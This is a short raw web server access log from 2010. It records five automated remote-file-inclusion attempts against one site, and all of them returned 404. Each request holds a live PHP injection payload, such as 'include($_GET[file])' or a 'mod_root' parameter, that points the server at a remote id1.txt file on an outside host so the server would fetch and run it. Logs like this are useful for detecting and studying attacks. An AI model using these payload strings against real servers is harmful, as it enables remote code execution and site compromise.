58.150.99.144 - - [25/Feb/2010:09:35:43 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:35:43 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:35:43 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:36:05 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:36:35 -0800] "GET /logs//admin/include/lib.module.php?mod_root=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
